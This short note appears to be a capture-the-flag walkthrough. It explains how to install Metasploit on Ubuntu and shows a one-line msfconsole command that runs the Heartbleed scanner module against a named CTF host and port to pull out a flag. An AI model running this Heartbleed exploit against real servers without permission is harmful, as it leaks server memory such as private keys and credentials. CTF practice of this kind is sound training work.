install on ubuntu using: sudo snap install metasploit-framework
launch using "msfconsole"
allow it to setup postgres database (storing scanner output etc to make other tools more efficient)
search for tools/command relating to "heart" by typing: search heart
How to grab CTF flag from heartbleed vulnerable server:
msfconsole -x "use auxiliary/scanner/ssl/openssl_heartbleed ; set RHOSTS $(dig +short challs.crate.nu) ; set RPORT 35486 ; set VERBOSE true ; run ; exit"